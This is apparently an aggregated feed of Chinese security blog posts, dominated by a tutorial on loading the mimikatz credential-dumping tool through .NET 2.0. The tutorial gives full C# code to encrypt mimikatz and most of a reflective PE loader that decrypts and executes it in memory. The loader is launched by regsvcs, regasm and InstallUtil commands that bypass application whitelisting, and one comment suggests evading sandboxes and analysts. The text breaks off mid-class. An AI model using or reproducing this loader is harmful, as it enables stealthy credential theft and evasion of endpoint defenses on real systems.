Channel Description:

all things

    Anyone who says OAuth 2.0 has vulnerabilities / that the protocol is insecure: stick your head out, the bricks are ready. Black Hat's talk on Pa […]

  • 11/08/16--00:28: A note on the 10th printing (chan 69772724)
  • The book 《Web前端黑客技术揭秘》 (Web Front-End Hacking Techniques Revealed) has reached its 10th printing since going on sale in January 2013; among security books, this result truly exceeded our […]


    Seebug Paper previously collected three related articles, namely: Bypassing mixed-content warnings – on a secure page […]


    JSON hijacking techniques for the modern Web http://paper.seebug.org/130/ The sneaky-trick crowd ac […]

  • 12/01/16--19:47: [PRE] CSRF attacks - Attack on Titan (chan 69772724)
  • Planning to put together a slide deck dedicated to the various clever tricks in CSRF, beyond the well-worn techniques: https://github. […]


    New year, new start. I tested this worm on a small scale, submitted it to the vendor for a fix, and shared it within a small circle; here it is officially made public, for research rather than destruction […]

  • 03/05/17--00:37: A case of a mining worm, uncensored (chan 69772724)
  • Early this morning our honeynet system surfaced an interesting string: zaxa2aq@protonmail.com ProtonMa […]

  • 05/18/17--19:39: Front-end hacking online tool XSS'OR (chan 69772724)
  • This is a free online front-end hacking tool, currently made up of 3 main modules: 1. the Encode/Decode module, which includes: […]


    XSS'OR is now open source under the BSD license, which is very permissive: no restrictions on distribution or commercial use, just keep the author's copyright notice. Below […]

  • 10/04/17--00:17: WordPress firewall (chan 69772724)
  • I have used this for a long time and recommend it: Wordfence Security. Try the details for yourself; let me talk about something else. WordPress […]

  • 12/19/17--06:03: Loading the latest Mimikatz with .NET 2.0 (chan 69772723)
  • 0x00 Preface

    subtee previously published a script that uses .NET 2.0 to load mimikatz; someone else's fork of the source is here. Today I saw that a new mimikatz version had been released, so I took the opportunity to read through this code and tried to use it to load the new version. The process is as follows.

    0x01 Generating the encrypted strings

    Looking at the code, it contains the encrypted strings for the 32-bit and 64-bit mimikatz, so we only need to replace them. For convenience, I pulled the encryption code out on its own, as follows:

    using System;
    using System.IO;
    using System.Text;
    using System.IO.Compression;
    using System.EnterpriseServices;
    using System.Collections.Generic;
    using System.Configuration.Install;
    using System.Runtime.InteropServices;
    using System.Security.Cryptography;
    
    /*
    Author: Evi1cg, Twitter: @Evi1cg
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /out:encode.exe  /unsafe encode.cs
    */
    
    namespace test
    {
        class Program
        {
            public class Misc
            {
                //Change This! Must match the SALT in katz2.0.cs byte for byte.
                private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
    
                public static void Stage(string fileName, string Key, string outFile)
                {
                    byte[] raw = FileToByteArray(fileName);
                    byte[] file = Encrypt(raw, Key);
    
                    //using disposes the stream, so the output is flushed and the handle closed
                    using (FileStream fileStream = File.Create(outFile))
                    {
                        fileStream.Write(file, 0, file.Length);//Write stream to temp file
                    }
    
                    Console.WriteLine("File Ready, Now Deliver Payload");
                }
    
                public static byte[] FileToByteArray(string _FileName)
                {
                    long _TotalBytes = new FileInfo(_FileName).Length;
                    using (FileStream _FileStream = new FileStream(_FileName, FileMode.Open, FileAccess.Read))
                    using (BinaryReader _BinaryReader = new BinaryReader(_FileStream))
                    {
                        return _BinaryReader.ReadBytes((Int32)_TotalBytes);
                    }
                }
    
                //Key and IV are both derived from password + SALT via PBKDF2 (Rfc2898DeriveBytes),
                //so Decrypt in katz2.0.cs can regenerate them from the same two inputs.
                public static byte[] Encrypt(byte[] plain, string password)
                {
                    MemoryStream memoryStream;
                    CryptoStream cryptoStream;
                    Rijndael rijndael = Rijndael.Create();
                    Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                    rijndael.Key = pdb.GetBytes(32);
                    rijndael.IV = pdb.GetBytes(16);
                    memoryStream = new MemoryStream();
                    cryptoStream = new CryptoStream(memoryStream, rijndael.CreateEncryptor(), CryptoStreamMode.Write);
                    cryptoStream.Write(plain, 0, plain.Length);
                    cryptoStream.Close();
                    return memoryStream.ToArray();
                }
    
                public static byte[] Decrypt(byte[] cipher, string password)
                {
                    MemoryStream memoryStream;
                    CryptoStream cryptoStream;
                    Rijndael rijndael = Rijndael.Create();
                    Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                    rijndael.Key = pdb.GetBytes(32);
                    rijndael.IV = pdb.GetBytes(16);
                    memoryStream = new MemoryStream();
                    cryptoStream = new CryptoStream(memoryStream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
                    cryptoStream.Write(cipher, 0, cipher.Length);
                    cryptoStream.Close();
                    return memoryStream.ToArray();
                }
    
                public static byte[] ReadFully(Stream input) //Returns Byte Array From Stream
                {
                    byte[] buffer = new byte[16 * 1024];
                    using (MemoryStream ms = new MemoryStream())
                    {
                        int read;
                        while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
                        {
                            ms.Write(buffer, 0, read);
                        }
                        return ms.ToArray();
                    }
                }
    
            }//End Misc Class
    
            static void Main(string[] args)
            {
                if (args.Length < 3)
                {
                    Console.WriteLine("usage: encode.exe input.exe out.txt password");
                }
                else
                {
                    string fileinput = args[0];
                    string fileoutput = args[1];
                    string password = args[2];
                    byte[] b  = Misc.FileToByteArray(fileinput);
                    byte[] e = Misc.Encrypt(b,password);
                    //Base64 so the ciphertext can be pasted into katz2.0.cs as a string literal
                    string f = System.Convert.ToBase64String(e);
                    File.WriteAllText(fileoutput,f);
                }
            }
        }
    }
    

    Compile it with csc. The first argument is the input file path, the second the output file path, and the third the encryption password. This password must match the one in katz2.0.cs, and the SALT in the script must also be kept identical; the SALT is a random set of bytes used to make unauthorized decryption of the message harder.

    The encryption process is shown below:

    [Screenshot: 1513687959081.png]

    0x02 Modifying katz2.0.cs

    Replace the mimikatz string contents in katz2.0.cs; they sit at the very bottom of the code below.

    using System;
    using System.IO;
    using System.Text;
    using System.IO.Compression;
    using System.EnterpriseServices;
    using System.Collections.Generic;
    using System.Configuration.Install;
    using System.Runtime.InteropServices;
    using System.Security.Cryptography;
    
    
    /*
    Author: Casey Smith, Twitter: @subTee
    License: BSD 3-Clause
    
    Create Your Strong Name Key -> key.snk
    
    $key = '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'
    $Content = [System.Convert]::FromBase64String($key)
    Set-Content key.snk -Value $Content -Encoding Byte
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
    x64
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe katz.exe
    
    [OR]
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe katz.exe
    //Executes UnRegisterClass If you don't have permissions
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe /U katz.exe
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U katz.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U katz.exe
    //This calls the UnregisterClass Method
    
    [OR]
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /U katz.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /U katz.exe
    
    
    
    */
    
    
    // Find/Replace All "password"
    // Find "SALT" and update those bytes
    
    namespace Delivery
    {
    
        public class Program
        {
            public static void Main(string[] args)
            {
                if(args.Length == 2) {
                    if(args[0] == "encrypt") {
                        String file = args[1];
    
                        //Example Extract Files and Encrypt.  Ideally you would compress.  But .NET 2 doesn't have really good Compression Libraries..
                        //byte[] b  = Misc.FileToByteArray(@"mimikatz64.exe");
                        byte[] b  = Misc.FileToByteArray(@file);
                        byte[] e = Misc.Encrypt(b,"password");
                        string f = System.Convert.ToBase64String(e);
                        File.WriteAllText(@"file.b64",f);
                        Console.WriteLine("{0}", f);
    
                        /*
                        byte[] b1  = Misc.FileToByteArray(@"mimikatzx86.exe");
                        byte[] e1 = Misc.Encrypt(b1,"password");
                        string f1 = System.Convert.ToBase64String(e1);
                        File.WriteAllText(@"filex86.b64",f1);
                */
    
                    }
                else {
                    //Add any behaviour here to throw off sandbox execution/analysts :)
                    Katz.Exec();
    
                }
    
            }
    
        }
    
    
        [System.ComponentModel.RunInstaller(true)]
        public class Sample : System.Configuration.Install.Installer
        {
            //The Methods can be Uninstall/Install.  Install is transactional, and really unnecessary.
            public override void Uninstall(System.Collections.IDictionary savedState)
            {
    
                //Console.WriteLine("Hello There From Uninstall");
                Katz.Exec();
    
            }
    
        }
    
        public class Bypass : ServicedComponent
        {
            public Bypass() { /*Console.WriteLine("I am a basic COM Object");*/ } //closing brace must not be swallowed by a line comment
    
            [ComRegisterFunction] //This executes if registration is successful
            public static void RegisterClass(string key)
            {
                Katz.Exec();
            }
    
            [ComUnregisterFunction] //This executes if registration fails
            public static void UnRegisterClass(string key)
            {
                Katz.Exec();
            }
        }
    
    
    
        public class Katz
        {
            //Since .NET 2 doesn't have a method for this, this should do the trick...
            public static IntPtr IntPtrAdd(IntPtr a, int b)
            {
                IntPtr ptr = new IntPtr(a.ToInt64() + b);
                return ptr;
            }
    
            public static void Exec()
            {
    
    
                byte[] latestMimikatz = null;
                try
                {
    
                    //Use Misc Class to encrypt your own files
    
    
    
                    if (IntPtr.Size == 8 )
                    {
                        //x64 Unpack And Execute
                        latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex64), "password"); //Yes, this is a bad idea.
    
                    }
                    else if (IntPtr.Size == 4 )
                    {
                        //x86 Unpack And Execute
                        latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex86), "password"); //Yes, this is a bad idea.
    
                    }
    
    
    
                }
                catch (Exception ex)
                {
                    while (ex != null)
                    {
                        //Console.WriteLine(ex.Message);
                        ex = ex.InnerException;
                    }
                }
    
                //Console.WriteLine("Downloaded Latest");
                PELoader pe = new PELoader(latestMimikatz);
    
    
    
                IntPtr codebase = IntPtr.Zero;
    
                if (pe.Is32BitHeader)
                {
                    //Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4"));
                    codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    //Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
                }
                else
                {
                    //Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4"));
                    codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    //Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
                }
    
    
    
                //Copy Sections
                for (int i = 0; i < pe.FileHeader.NumberOfSections; i++)
                {
    
                    IntPtr y = NativeDeclarations.VirtualAlloc(IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData);
                    //Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4"));
                }
    
                //Perform Base Relocation
                //Calculate Delta
                IntPtr currentbase = codebase;
                long delta;
                if (pe.Is32BitHeader)
                {
    
                    delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase);
                }
                else
                {
    
                    delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase);
                }
    
                //Console.WriteLine("Delta = {0}", delta.ToString("X4"));
    
                //Modify Memory Based On Relocation Table
                IntPtr relocationTable;
                if (pe.Is32BitHeader)
                {
                    relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress));
                }
                else
                {
                    relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress));
                }
    
    
                NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
                relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
    
                int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
                IntPtr nextEntry = relocationTable;
                int sizeofNextBlock = (int)relocationEntry.SizeOfBlock;
                IntPtr offset = relocationTable;
    
                while (true)
                {
    
                    NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
                    IntPtr x = IntPtrAdd(relocationTable, sizeofNextBlock);
                    relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
    
                    IntPtr dest = IntPtrAdd(codebase, (int)relocationEntry.VirtualAdress);
    
                    for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++)
                    {
    
                        IntPtr patchAddr;
                        UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));
    
                        UInt16 type = (UInt16)(value >> 12);
                        UInt16 fixup = (UInt16)(value & 0xfff);
    
                        switch (type)
                        {
                            case 0x0:
                                break;
                            case 0x3:
                                patchAddr = IntPtrAdd(dest, fixup);
                                //Add Delta To Location.
                                int originalx86Addr = Marshal.ReadInt32(patchAddr);
                                Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta);
                                break;
                            case 0xA:
                                patchAddr = IntPtrAdd(dest, fixup);
                                //Add Delta To Location.
                                long originalAddr = Marshal.ReadInt64(patchAddr);
                                Marshal.WriteInt64(patchAddr, originalAddr + delta);
                                break;
    
                        }
    
                    }
    
                    offset = IntPtrAdd(relocationTable, sizeofNextBlock);
                    sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
                    relocationEntry = relocationNextEntry;
    
                    nextEntry = IntPtrAdd(nextEntry, sizeofNextBlock);
    
                    if (relocationNextEntry.SizeOfBlock == 0) break;
    
    
                }
    
    
                //Resolve Imports
    
                IntPtr z;
                IntPtr oa1;
                int oa2;
    
                if (pe.Is32BitHeader)
                {
                    z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
                    oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
                    oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
                }
                else
                {
                    z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
                    oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
                    oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
                }
    
    
    
                //Get And Display Each DLL To Load
    
                IntPtr threadStart;
                IntPtr hThread;
                if (pe.Is32BitHeader)
                {
                    int j = 0;
                    while (true) //HardCoded Number of DLL's Do this Dynamically.
                    {
                        IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
                        int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
                        IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2));
                        IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
                        string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
                        if (DllName == "") { break; }
    
                        IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
                        //Console.WriteLine("Loaded {0}", DllName);
                        int k = 0;
                        while (true)
                        {
                            IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
                            string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
                            IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
                            Marshal.WriteInt32(a2, (int)funcAddy);
                            a2 = IntPtrAdd(a2, 4);
                            if (DllFuncName == "") break;
                            k++;
                        }
                        j++;
                    }
                    //Transfer Control To OEP
                    //Console.WriteLine("Executing Mimikatz");
                    threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint);
                    hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
                    NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
    
                    //Console.WriteLine("Thread Complete");
                }
                else
                {
                    int j = 0;
                    while (true)
                    {
                        IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
                        int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
                        IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part?
                        IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
                        string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
                        if (DllName == "") { break; }
    
                        IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
                        //Console.WriteLine("Loaded {0}", DllName);
                        int k = 0;
                        while (true)
                        {
                            IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
                            string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
                            ////Console.WriteLine("Function {0}", DllFuncName);
                            IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
                            Marshal.WriteInt64(a2, (long)funcAddy);
                            a2 = IntPtrAdd(a2, 8);
                            if (DllFuncName == "") break;
                            k++;
                        }
                        j++;
                    }
                    //Transfer Control To OEP
                    //Console.WriteLine("Executing Mimikatz");
                    threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint);
                    hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
                    NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
    
                    //Console.WriteLine("Thread Complete");
                }
    
                //Transfer Control To OEP
    
                //Console.WriteLine("Thread Complete");
                //Console.ReadLine();
    
    
    
    
            } //End Main
    
    
    
        }//End Program
    
        public class PELoader
        {
            public struct IMAGE_DOS_HEADER
            {      // DOS .EXE header
                public UInt16 e_magic;              // Magic number
                public UInt16 e_cblp;               // Bytes on last page of file
                public UInt16 e_cp;                 // Pages in file
                public UInt16 e_crlc;               // Relocations
                public UInt16 e_cparhdr;            // Size of header in paragraphs
                public UInt16 e_minalloc;           // Minimum extra paragraphs needed
                public UInt16 e_maxalloc;           // Maximum extra paragraphs needed
                public UInt16 e_ss;                 // Initial (relative) SS value
                public UInt16 e_sp;                 // Initial SP value
                public UInt16 e_csum;               // Checksum
                public UInt16 e_ip;                 // Initial IP value
                public UInt16 e_cs;                 // Initial (relative) CS value
                public UInt16 e_lfarlc;             // File address of relocation table
                public UInt16 e_ovno;               // Overlay number
                public UInt16 e_res_0;              // Reserved words
                public UInt16 e_res_1;              // Reserved words
                public UInt16 e_res_2;              // Reserved words
                public UInt16 e_res_3;              // Reserved words
                public UInt16 e_oemid;              // OEM identifier (for e_oeminfo)
                public UInt16 e_oeminfo;            // OEM information; e_oemid specific
                public UInt16 e_res2_0;             // Reserved words
                public UInt16 e_res2_1;             // Reserved words
                public UInt16 e_res2_2;             // Reserved words
                public UInt16 e_res2_3;             // Reserved words
                public UInt16 e_res2_4;             // Reserved words
                public UInt16 e_res2_5;             // Reserved words
                public UInt16 e_res2_6;             // Reserved words
                public UInt16 e_res2_7;             // Reserved words
                public UInt16 e_res2_8;             // Reserved words
                public UInt16 e_res2_9;             // Reserved words
                public UInt32 e_lfanew;             // File address of new exe header
            }
    
            [StructLayout(LayoutKind.Sequential)]
            public struct IMAGE_DATA_DIRECTORY
            {
                public UInt32 VirtualAddress;
                public UInt32 Size;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_OPTIONAL_HEADER32
            {
                public UInt16 Magic;
                public Byte MajorLinkerVersion;
                public Byte MinorLinkerVersion;
                public UInt32 SizeOfCode;
                public UInt32 SizeOfInitializedData;
                public UInt32 SizeOfUninitializedData;
                public UInt32 AddressOfEntryPoint;
                public UInt32 BaseOfCode;
                public UInt32 BaseOfData;
                public UInt32 ImageBase;
                public UInt32 SectionAlignment;
                public UInt32 FileAlignment;
                public UInt16 MajorOperatingSystemVersion;
                public UInt16 MinorOperatingSystemVersion;
                public UInt16 MajorImageVersion;
                public UInt16 MinorImageVersion;
                public UInt16 MajorSubsystemVersion;
                public UInt16 MinorSubsystemVersion;
                public UInt32 Win32VersionValue;
                public UInt32 SizeOfImage;
                public UInt32 SizeOfHeaders;
                public UInt32 CheckSum;
                public UInt16 Subsystem;
                public UInt16 DllCharacteristics;
                public UInt32 SizeOfStackReserve;
                public UInt32 SizeOfStackCommit;
                public UInt32 SizeOfHeapReserve;
                public UInt32 SizeOfHeapCommit;
                public UInt32 LoaderFlags;
                public UInt32 NumberOfRvaAndSizes;
    
                public IMAGE_DATA_DIRECTORY ExportTable;
                public IMAGE_DATA_DIRECTORY ImportTable;
                public IMAGE_DATA_DIRECTORY ResourceTable;
                public IMAGE_DATA_DIRECTORY ExceptionTable;
                public IMAGE_DATA_DIRECTORY CertificateTable;
                public IMAGE_DATA_DIRECTORY BaseRelocationTable;
                public IMAGE_DATA_DIRECTORY Debug;
                public IMAGE_DATA_DIRECTORY Architecture;
                public IMAGE_DATA_DIRECTORY GlobalPtr;
                public IMAGE_DATA_DIRECTORY TLSTable;
                public IMAGE_DATA_DIRECTORY LoadConfigTable;
                public IMAGE_DATA_DIRECTORY BoundImport;
                public IMAGE_DATA_DIRECTORY IAT;
                public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
                public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
                public IMAGE_DATA_DIRECTORY Reserved;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_OPTIONAL_HEADER64
            {
                public UInt16 Magic;
                public Byte MajorLinkerVersion;
                public Byte MinorLinkerVersion;
                public UInt32 SizeOfCode;
                public UInt32 SizeOfInitializedData;
                public UInt32 SizeOfUninitializedData;
                public UInt32 AddressOfEntryPoint;
                public UInt32 BaseOfCode;
                public UInt64 ImageBase;
                public UInt32 SectionAlignment;
                public UInt32 FileAlignment;
                public UInt16 MajorOperatingSystemVersion;
                public UInt16 MinorOperatingSystemVersion;
                public UInt16 MajorImageVersion;
                public UInt16 MinorImageVersion;
                public UInt16 MajorSubsystemVersion;
                public UInt16 MinorSubsystemVersion;
                public UInt32 Win32VersionValue;
                public UInt32 SizeOfImage;
                public UInt32 SizeOfHeaders;
                public UInt32 CheckSum;
                public UInt16 Subsystem;
                public UInt16 DllCharacteristics;
                public UInt64 SizeOfStackReserve;
                public UInt64 SizeOfStackCommit;
                public UInt64 SizeOfHeapReserve;
                public UInt64 SizeOfHeapCommit;
                public UInt32 LoaderFlags;
                public UInt32 NumberOfRvaAndSizes;
    
                public IMAGE_DATA_DIRECTORY ExportTable;
                public IMAGE_DATA_DIRECTORY ImportTable;
                public IMAGE_DATA_DIRECTORY ResourceTable;
                public IMAGE_DATA_DIRECTORY ExceptionTable;
                public IMAGE_DATA_DIRECTORY CertificateTable;
                public IMAGE_DATA_DIRECTORY BaseRelocationTable;
                public IMAGE_DATA_DIRECTORY Debug;
                public IMAGE_DATA_DIRECTORY Architecture;
                public IMAGE_DATA_DIRECTORY GlobalPtr;
                public IMAGE_DATA_DIRECTORY TLSTable;
                public IMAGE_DATA_DIRECTORY LoadConfigTable;
                public IMAGE_DATA_DIRECTORY BoundImport;
                public IMAGE_DATA_DIRECTORY IAT;
                public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
                public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
                public IMAGE_DATA_DIRECTORY Reserved;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_FILE_HEADER
            {
                public UInt16 Machine;
                public UInt16 NumberOfSections;
                public UInt32 TimeDateStamp;
                public UInt32 PointerToSymbolTable;
                public UInt32 NumberOfSymbols;
                public UInt16 SizeOfOptionalHeader;
                public UInt16 Characteristics;
            }
    
            [StructLayout(LayoutKind.Explicit)]
            public struct IMAGE_SECTION_HEADER
            {
                [FieldOffset(0)]
                [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
                public char[] Name;
                [FieldOffset(8)]
                public UInt32 VirtualSize;
                [FieldOffset(12)]
                public UInt32 VirtualAddress;
                [FieldOffset(16)]
                public UInt32 SizeOfRawData;
                [FieldOffset(20)]
                public UInt32 PointerToRawData;
                [FieldOffset(24)]
                public UInt32 PointerToRelocations;
                [FieldOffset(28)]
                public UInt32 PointerToLinenumbers;
                [FieldOffset(32)]
                public UInt16 NumberOfRelocations;
                [FieldOffset(34)]
                public UInt16 NumberOfLinenumbers;
                [FieldOffset(36)]
                public DataSectionFlags Characteristics;
    
                public string Section
                {
                    get { return new string(Name); }
                }
            }
    
            [StructLayout(LayoutKind.Sequential)]
            public struct IMAGE_BASE_RELOCATION
            {
                public uint VirtualAdress;
                public uint SizeOfBlock;
            }
    
            [Flags]
            public enum DataSectionFlags : uint
            {
    
                Stub = 0x00000000,
    
            }
    
    
            /// The DOS header
    
            private IMAGE_DOS_HEADER dosHeader;
    
            /// The file header
    
            private IMAGE_FILE_HEADER fileHeader;
    
            /// Optional 32 bit file header
    
            private IMAGE_OPTIONAL_HEADER32 optionalHeader32;
    
            /// Optional 64 bit file header
    
            private IMAGE_OPTIONAL_HEADER64 optionalHeader64;
    
            /// Image Section headers. Number of sections is in the file header.
    
            private IMAGE_SECTION_HEADER[] imageSectionHeaders;
    
            private byte[] rawbytes;
    
    
    
            public PELoader(string filePath)
            {
                // Read the DLL or EXE from disk and parse its headers
                using (FileStream stream = new FileStream(filePath, System.IO.FileMode.Open, System.IO.FileAccess.Read))
                {
                    BinaryReader reader = new BinaryReader(stream);
                    dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
    
                    // Seek to the NT headers; e_lfanew holds their file offset
                    stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
    
                    UInt32 ntHeadersSignature = reader.ReadUInt32();
                    fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
                    if (this.Is32BitHeader)
                    {
                        optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
                    }
                    else
                    {
                        optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
                    }
    
                    imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
                    for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
                    {
                        imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
                    }
    
    
    
                    rawbytes = System.IO.File.ReadAllBytes(filePath);
    
                }
            }
    
            public PELoader(byte[] fileBytes)
            {
                // Parse the headers of an image already held in memory
                using (MemoryStream stream = new MemoryStream(fileBytes, 0, fileBytes.Length))
                {
                    BinaryReader reader = new BinaryReader(stream);
                    dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
    
                    // Seek to the NT headers; e_lfanew holds their offset
                    stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
    
                    UInt32 ntHeadersSignature = reader.ReadUInt32();
                    fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
                    if (this.Is32BitHeader)
                    {
                        optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
                    }
                    else
                    {
                        optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
                    }
    
                    imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
                    for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
                    {
                        imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
                    }
    
    
                    rawbytes = fileBytes;
    
                }
            }
    
    
            public static T FromBinaryReader<T>(BinaryReader reader)
            {
                // Read in a byte array
                byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T)));
    
                // Pin the managed memory while, copy it out the data, then unpin it
                GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned);
                T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T));
                handle.Free();
    
                return theStructure;
            }
    
    
    
            public bool Is32BitHeader
            {
                get
                {
                    UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
                    return (IMAGE_FILE_32BIT_MACHINE & FileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE;
                }
            }
    
    
            public IMAGE_FILE_HEADER FileHeader
            {
                get
                {
                    return fileHeader;
                }
            }
    
    
            /// Gets the optional header
    
            public IMAGE_OPTIONAL_HEADER32 OptionalHeader32
            {
                get
                {
                    return optionalHeader32;
                }
            }
    
    
            /// Gets the optional header
    
